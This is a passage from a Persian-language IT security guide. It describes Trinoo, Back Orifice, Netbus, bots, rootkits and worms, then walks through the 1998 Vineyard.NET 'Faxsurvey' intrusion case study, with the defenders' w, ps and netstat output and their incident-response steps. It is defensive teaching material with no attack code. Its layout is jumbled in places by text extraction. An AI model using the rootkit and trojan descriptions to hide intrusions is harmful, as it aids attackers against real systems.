ﺭﺩﻳﺎﺑﻲ ﻛﺎﺭﻫﺎﻱ ﻣﻬﺎﺟﻢ ﺗﺎ ﺭﺳﻴﺪﻥ ﺑﻪ ﻣﻬﺎﺟﻢ ﻭﺍﻗﻌﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺍﮔﺮ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭ ﺣﻮﺯﻩﻫـﺎﻱ
ﻣﺨﺘﻠﻔﻲ ﺑﺠﻬﺪ -ﻣﺜﻼﹰ ،ﺍﺯ ﻳﻚ ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ ﺗﺤﺖ Unixﺩﺭ ﻓﺮﺍﻧﺴﻪ ﺗﺎ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ proxyﻣﺒﺘﻨﻲ ﺑـﺮ windowsﺩﺭ ﻛـﺮﻩ
ﺟﻨﻮﺑﻲ ،ﻭ ﺍﺯ ﻳﻚ ﻣﺮﻛﺰ ﺭﺍﻳﺎﻧﺔ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺩﺭ ﻣﻜﺰﻳﻚ ﺗﺎ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﺷﺎﻫﺮﺍﻩ ٤٠ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ -ﻣﻤﻜﻦ ﺍﺳـﺖ ﻭﺍﻗﻌـﹰﺎ ﺭﺩﻳـﺎﺑﻲ ﻣﻌﻜـﻮﺱ
ﻣﻬﺎﺟﻢ ﺑﻪ ﺳﻤﺖ ﻣﺒﺪﺃ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ.
٢٧٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
(a.k.a. Trinoo) Trinoo
Trinooﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺗﻬﺎﺟﻢ ﺍﺳﺖ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻨﺘﻈﺮ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﭘﻴﺎﻡ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻩ ﺩﻭﺭ ﻣﻲﻣﺎﻧﺪ ،ﻭ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﭘﻴـﺎﻡ ﻳـﻚ
ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﺍ ﻋﻠﻴﻪ ﻳﻚ ﺷﺨﺺ ﺛﺎﻟﺚ ﺷﺮﻭﻉ ﻣﻲﻛﻨﺪ .ﻧﺴﺨﻪﻫﺎﻱ Trinooﺑﺮﺍﻱ ﺍﻏﻠـﺐ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎﻱ Unixﺍﺯ ﺟﻤﻠـﻪ
ﻻ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻴﺎﻧﻪ ﻣﻲﺑﺎﺷﺪ .ﻳﻚ ﺗﺤﻠﻴﻞ ﻣـﺸﺮﻭﺡ ﺍﺯ Trinooﺩﺭ
Solarisﻭ Red Hat Linuxﻣﻮﺟﻮﺩ ﺍﺳﺖ .ﻭﺟﻮﺩ Trinooﻣﻌﻤﻮ ﹰ
ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ:
http://staff.washington.edu/dittrich/misc/trinoo.analysis
Back Orificeﻭ Netbus
ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ windowsﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﺑﺮ ﺿﺮﺑﻪﻫﺎﻱ ﺻﻔﺤﻪ ﻛﻠﻴﺪ ﻧﻈـﺎﺭﺕ ﻛﻨﻨـﺪ،
ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ uploadﻭ downloadﻛﻨﻨﺪ ،ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺭﺍ ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ﻓﺮﻣـﺎﻥ ﺑـﻪ ﺍﺟـﺮﺍ
ﺩﺭﺁﻭﺭﻧﺪ.
Botﻫﺎ
ﻻ ﺑﻮﺳﻴﻠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺭﻭﻱ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﭘﺨـﺶﺷـﺪﻩ ﺩﺭ ﺷـﺒﻜﻪ
Botﻫﺎ )ﻣﺨﻔﻒ robotﻫﺎ( ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪBot .ﻫﺎ ﻳﻜﻲ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻘﺪﻣﺎﺗﻲ ﺑﺮﺍﻱ ﻣﻬﺎﺭ ﻭ ﻫﺪﺍﻳﺖ ﺣﻤﻼﺕ ﺗﻮﺯﻳﻊﺷـﺪﺓ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺭﻭﻱ ﻛﺎﻧﺎﻟﻬـﺎﻱ
ﺗﻘﻮﻳﺖ ﮔﻔﺘﮕﻮﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﺑﺎﺷﻨﺪBot .ﻫﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺑﻮﺳﻴﻠﺔ ﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻳﺎ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﺗﻮﺯﻳﻊ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻤﮑﻦ ﺍﺳﺖ ﺗـﺎ
ﺭﻭﺯﻫﺎ ،ﻫﻔﺘﻪﻫﺎ ،ﻭ ﻳﺎ ﻣﺎﻫﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﺑﮑﺎﺭ ﺑﻴﺎﻓﺘﻨﺪ .ﺍﺯ botﻫﺎ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﮐﺎﺭﻫﺎﻱ ﺧﻮﺩﮐﺎﺭ ﻧﻴﺰ ﺑﻬﺮﻩ ﺑﺮﺩ.
Rootkitﻫﺎ
rootkitﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺳﺖ ﻛﻪ ﻫﻤﺰﻣﺎﻥ ﺑﻪ ﻣﻬﺎﺟﻢ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻛﺎﺭﺑﺮ ﺳﻄﺢ ﺑﺎﻻ ﺭﺍ ﺩﺭ ﻳﻚ ﺭﺍﻳﺎﻧـﻪ ﻣـﻲﺩﻫـﺪ،
ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻛﺎﺭ ﻣﻲﮔﺬﺍﺭﺩ ،ﻭ ﻫﺮ ﺭﺩﭘﺎﻳﻲ ﺍﺯ ﺣﻀﻮﺭ ﻣﻬﺎﺟﻢ ﺭﺍ ﭘﺎﻙ ﻣﻲﻛﻨﺪ .ﺩﺭ ﺍﺑﺘﺪﺍ rootkitﻫﺎ ﺑﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ Unix
ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻮﺩﻧﺪ )ﻭ ﻧﺎﻡ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ rootﻧﻴﺰ ﺍﺯ ﻫﻤﻴﻨﺠﺎ ﺁﻣـﺪﻩ( ،ﻭﻟﻲ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ windowsﻫﻢ ﺗﻮﻟﻴـﺪ ﺷـﺪﻩﺍﻧـﺪ .ﻳـﻚ rootkit
ﻧﻮﻋﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻛﺎﺭﺑﺮ ﺳﻄﺢ ﺑﺎﻻ ﺗﻼﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﻫﺪ .ﻫﻤﻴﻨﻜﻪ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮ ﺳـﻄﺢ ﺑـﺎﻻ
ﺑﺪﺳﺖ ﺁﻣﺪ rootkit ،ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻛﻪ ﻳﻚ ﺩﺭﺏ ﻣﺨﻔﻲ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﺷﻮﺩ .ﺁﻧﮕﺎﻩ ﻫﺴﺘﺔ ﺍﺻﻠﻲ
ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ ﻛﻪ ﻫﺮ ﺗﻼﺵ ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ،ﺑﺠﺎﻱ ﺑﺮﻧﺎﻣﺔ ﺍﺻﻠﻲ ﻣﻘﺪﺍﺭ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﺪ؛ ﻓﺮﺍﻣﻴﻦ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ﻛﻪ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻣﻬﺎﺟﻢ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻧﻴﺎﻳﻨﺪ؛ ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ rootkitﻣﻤﻜﻦ ﺍﺳﺖ ﭘﻨﺞ
ﺩﻗﻴﻘﻪ ﺍﻧﺘﻬﺎﻳﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺍﺯ ﺣﺎﻓﻈﺔ ﺭﺍﻳﺎﻧﻪ ﺣﺬﻑ ﻛﻨﺪ.
ﻛﺮﻣﻬﺎ
٤٣
ﻛﺮﻣﻬﺎ ﻛﻪ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ ﻳﺎ ﺍﺟﺰﺍﻱ ﺷﺒﻜﻪﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺒﺪﻳﻞ ﺑﻪ ﺭﻭﺵ ﺭﺍﻳﺠﻲ
ﺑﺮﺍﻱ ﺧﺪﺷﻪ ﺩﺍﺭ ﻛﺮﺩﻥ ﺁﻧﻲ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺷﺪﻩﺍﻧﺪ.
ﻣﻄﺎﻟﻌﻪ ﻣﻮﺭﺩﻱFaxsurvey :
ﺩﺭ ﻫﻔﺘﻢ ﺍﻛﺘﺒﺮ ،۱۹۹۸ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺩﺭ Vineyard.NETﻣﺘﻮﺟﻪ ﺷﺪ ﻛﻪ ﻛﺎﺭﺑﺮ httpﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﻭﺏ ﺷـﺮﻛﺖ ﻭﺍﺭﺩ ﺷـﺪﻩ
ﺍﺳﺖ:
Script started on Wed Oct 7 20:54:21 1998
Bash-2.02# W
8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35
USER TTY FROM
LOGIN@ IDLE WHAT
Worms
43
٢٧١
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
http p0 KRLDB110-06.spli Tue02AM 1days /bin/sh
)simsong p1 asy12.vineyard.n 8:42PM 15 -tcsh (tcsh
ericx p2 mac-ewb.vineyard 8:46PM 0 script
ericx p3 mac-ewb.vineyard 8:46PM 11 top
ericx p4 mac-ewb.vineyard 8:53PM 1 sleep 5
bash-2.02#
ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺎ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ BSDIﻧﮕﺎﺭﺵ ۳,۱ﺑﺎ ﻫﻤﺔ ﻭﺻﻠﻪﻫﺎ ٤٤ﻭ ﺍﺻﻼﺣﺎﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﻩ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺑﻮﺩ ﻛﺎﺭ ﻣﻲﻛﺮﺩ .ﺳﺮﻭﻳﺲ-
ﺩﻫﻨﺪﺓ ﻭﺏ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Apacheﻣﻮﺳﻮﻡ ﺑﻪ " "Strong-holdﺑﻮﺩ .ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺮﺍﻱ ﺷـﺮﻭﻉ ﻋﻤﻠﻴـﺎﺕ ﺧﻮﺩﻛـﺎﺭ ﻧﻘـﻞ ﻭ
ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭﺟﻮﻩ ﻛﺎﺭﻫﺎﻱ ﺧﺎﻧﮕﻲ ﺩﺭ ﺣﺴﺎﺑﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪ .ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﻧﻘـﻞ ﻭ ﺍﻧﺘﻘـﺎﻻﺕ ﺍﻳـﻦ ﻭﺟـﻮﻩ ،ﺭﺍﻳﺎﻧـﻪ
ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻭ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﺮﺩ) .ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻗﺎﻟﺐ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﺷﺪ(.
ﺩﺭ ﻫﻤﺔ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ ،ﻭﺭﻭﺩ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻌﻨﻮﺍﻥ httpﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠﻪ ﺩﻭ ﭼﻴﺰ ﺑﺎﺷﺪ .ﺍﻭﻝ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﻀﻮ ﭘﺮﺳﻨﻞ ISPﺑﺎﺷﺪ
ﻛﻪ ﺍﺯ ﺣﺴﺎﺏ httpﺑﺮﺍﻱ ﺭﻓﻊ ﺍﺷﻜﺎﻝ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻩ ،ﻭ ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻤﻲ ﺑﺎﺷﺪ ﻛﻪ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑـﻪ ﺣـﺴﺎﺏ
httpﭘﻴﺪﺍ ﻛﺮﺩﻩ ﺍﻣﺎ ﻣﻮﻓﻖ ﻧﺸﺪﻩ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩ .ﭼﻮﻥ ﻛﺎﺭﺑﺮ httpﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻧـﺎﻣﺶ ﺑـﺎ KRLD110-06.spli
ﺷﺮﻭﻉ ﻣﻲﺷﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﺑﻮﺩ ،ﻛﺎﺭﻣﻨﺪ ﺍﻳﻦ ﻣﺆﺳﺴﻪ ﻓﻬﻤﻴﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻳﻚ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮ ﻣﺠﺎﺯ ﺑﻮﺩﻩ ﺍﺳﺖ.
ﻭﻗﺘﻲ ﻧﻔﻮﺫ ﻛﺸﻒ ﺷﺪ ،ﻳﻜﻲ ﺍﺯ ﭘﺮﺳﻨﻞ ﺑﻼﻓﺎﺻﻠﻪ ﺑﺮﻧﺎﻣﻪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺼﻮﺹ Unixﺭﺍ ﺍﺟﺮﺍ ﻛﺮﺩ ﺗﺎ ﺍﻗﺪﺍﻣﺎﺕ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺛﺒـﺖ ﻛﻨـﺪ.
ﺑﻨﻈﺮ ﺭﺳﻴﺪ ﻛﻪ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺗﺎ ﻣﺪﺕ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺭﻭﺯ ﺑﻪ ﺷﺒﻜﻪ ﻣﺘﺼﻞ ﻧﺸﺪ .ﻧﻔﻮﺫ ﺍﻭﻟﻴﻪ ﺩﺭ ﺭﻭﺯ ﺳﻪﺷﻨﺒﻪ ﺳﺎﻋﺖ ۲ﺑﺎﻣﺪﺍﺩ ﺭﺥ
ﺩﺍﺩﻩ ﺑﻮﺩ .ﮔﺎﻡ ﺑﻌﺪﻱ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻫﻤﺔ ﭘﺮﺩﺍﺯﻩﻫﺎﻳﻲ ٤٥ﻛﻪ ﺩﺭ ﺁﻧﺰﻣﺎﻥ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩﻧﺪ ﻓﻬﺮﺳﺖ ﺷﻮﻧﺪ .ﺩﻭ ﭘﺮﺩﺍﺯﻩ ﻏﻴﺮﻋﺎﺩﻱ ﺑﻮﺩﻧﺪ
ﺩﻭ ﻧﺴﺨﻪ ﺍﺯ ﭘﻮﺳﺘﻪ /bin/sh ٤٦ﻛﻪ ﺗﻮﺳﻂ httpﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻣﺪﻩ ﺑﻮﺩﻧﺪ .ﻫﺮ ﺩﻭﻱ ﺍﻳﻦ ﭘﻮﺳﺘﻪﻫﺎ ﺍﺯ ﺭﻭﺯ ﮔﺬﺷـﺘﻪ ﺷـﺮﻭﻉ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩﻩﺑﻮﺩﻧﺪ؛ ﻳﻜﻲ ﺩﺭ ﺳﺎﻋﺖ ۲ﺑﺎﻣﺪﺍﺩ ﻭ ﺩﻳﮕﺮﻱ ۴ﺑﺎﻣﺪﺍﺩ.
ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﻣﻮﻓﻖ ﺑﻪ ﻧﻔﻮﺫ ﺷﺪﻩ ﻭ ﺳﭙﺲ ﺑﻨﺎ ﺑﻪ ﺩﻻﻳﻠﻲ ﻛﺎﺭ ﺭﺍ ﺭﻫﺎ ﻛﺮﺩﻩ ﺍﺳﺖ ISP .ﺑﺮﺍﻱ ﺭﻭﻳـﺎﺭﻭﻳﻲ ﺑـﺎ ﺍﻳـﻦ ﺗﻬﺪﻳـﺪ
ﺿﻮﺍﺑﻂ ﺯﻳﺮ ﺭﺍ ﺍﺑﻼﻍ ﻛﺮﺩ:
.۱
.۲
.۳
ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺍﺯ ﺁﻧﭽﻪ ﺩﺭﺣﺎﻝ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻥ ﺍﺳﺖ ﺁﮔﺎﻩ ﻧﻜﻨﻴﺪ.
ﺁﺩﺭﺱ IPﻣﺒﺪﺃ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ.
ﺍﺯ ﻓﺮﻣﺎﻥ killﺩﺭ Unixﺑﺮﺍﻱ ﺗﻮﻗﻒ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﻣﺰﺍﺣﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻓﺮﻣﺎﻥ ﻋﻠﻴﺮﻏﻢ ﺑﺎﻗﻲ ﮔﺬﺍﺷﺘﻦ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﭘـﺮﺩﺍﺯﻩﻫـﺎ
ﺩﺭ ﺣﺎﻓﻈﻪ ،ﺍﺯ ﺍﺟﺮﺍﻱ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﺪ.
Patches
Process
Shell
44
45
46
ﺑﺨﺶ ﭘﻨﺠﻢ
bash-2.02# ps auxww
USER PID %CPU %MEM VSZ RSS TT STATED TIME COMMAND
root
)11766 3.0 0.0 0 0 ?? Z 23Sep98 0:00.00 (admin-server
root
)3763 1.0 0.0 0 0 ?? Z 2:03PM 0:00.00 (junkbuster
mail
18120 1.3 0.3 816 724 ?? S 8:56PM 0:00.46 smap
root
)17573 1.0 0.0 0 0 ?? Z 11:03AM 0:00.00(admin-server
root
16 0.0 0.0 68 64 ?? Is 10Sep98 0:00.00 asyncd 2
root
18 0.0 0.0 68 64 ?? Is 10Sep98 0:00.02 asyncd 2
root
28 0.0 8.0 748 20680 ?? Ss 10Sep98 0:16.32 mfs -o rw -s 40960 /dev/sdob/tmp
)(mount_mfs
root
53 0.0 0.1 268 296 ?? Ss 10Sep98 0:38.23 gettyd –s
root
)18670 0.0 0.5 560 1276 ?? S Tue02AM 0:04.77 (xterm
http
18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh
http
26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.7 /bin/sh
…
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
. ﻳﻚ ﻧﺴﺨﺔ ﺛﺎﻧﻮﻳﻪ ﺍﺯ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺗﻬﻴﻪ ﻛﻨﻴﺪUnix ﺩﺭgcore ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ
. ﻧﻔﻮﺫﮔﺮ ﺗﻌﺮﻳﻒ ﻧﻤﺎﻳﻴﺪISP ﺑﺮﺍﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﺑﺴﺘﻪﻫﺎﻱ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﻣﺒﺪﺃISP ﻳﻚ ﺿﺎﺑﻄﻪ ﺩﺭ ﻣﺴﻴﺮﻳﺎﺏ
.ﻼ ﺍﺯ ﺑﻴﻦ ﺑﺒﺮﻳﺪ
ﻛﺎﻣ ﹰkill -9 ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﺷﺨﺺ ﻣﺰﺍﺣﻢ ﺭﺍ ﺑﺎ ﻓﺮﻣﺎﻥ
.ﻣﺸﺨﺺ ﻛﻨﻴﺪ ﻧﻔﻮﺫﮔﺮ ﭼﮕﻮﻧﻪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺣﻔﺮﺓ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺭﺍ ﺍﺻﻼﺡ ﻛﻨﻴﺪ
.ﻣﺠﺮﻳﺎﻥ ﻗﻀﺎﻳﻲ ﺭﺍ ﻣﻄﻠﻊ ﺳﺎﺯﻳﺪ
٢٧٢
.۴
.۵
.۶
.۷
.۸
ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺟﺪﻳـﺪﻱ ﺑﺪﺳـﺖ. ﺍﻳﻦ ﻛﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﺪnetstat ﺳﻌﻲ ﻛﺮﺩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥISP ،ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﻧﻔﻮﺫﮔﺮ
( ﺑـﻪApache.Vineyard.NET) ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏX11 ﺑﻠﻜﻪ ﻳﻚ ﺍﺗﺼﺎﻝ، ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﺸﺪﻩ ﺑﻮﺩSSH ﻳﺎtelnet ﻧﻔﻮﺫﮔﺮ ﺑﺎ.ﺁﻣﺪ
. ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻬﺎﺟﻢ ﺍﺟﺮﺍ ﻣﻲﺷﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺖX ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ
bash-2.02# netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp
0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1137 SYN_RCVD
tcp
0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1136 SYN_RCVD
tcp
0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1135 SYN_RCVD
tcp
0 0 VINEYARD.NET.http DSY27.VINEYARD.N.1079 SYN_RCVD
tcp
0 2456 VINEYARD.NET.http nhv-ct4-09.ix.ne.1134 ESTABLISHED
tcp
0 2268 VINEYARD.NET.http DSY27.VINEYARD.N.1078 ESTABLISHED
tcp
0 2522 VINEYARD.NET.http 209.174.140.26.1205 ESTABLISHED
tcp
0 8192 VINEYARD.NET.http host-209-214-118.1785 ESTABLISHED
tcp
0 4916 VINEYARD.NET.http host-209-214-118.1784 ESTABLISHED
tcp
0 0 VINEYARD.NET.http host-209-214-118.1783 ESTABLISHED
tcp
0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1163 FIN_WAIT_2
tcp
0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1135 ESTABLISHED
tcp
0 0 LOCALHOST.VINEYA.1135 LOCALHOST.VINEYA.sendm ESTABLISHED
tcp
0 0 VINEYARD.NET.smtp 208.135.218.34.1479 ESTABLISHED
tcp
0 3157 VINEYARD.NET.pop ASY5.VINEYARD.NE.1027 ESTABLISHED
tcp
0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2050 ESTABLISHED
tcp
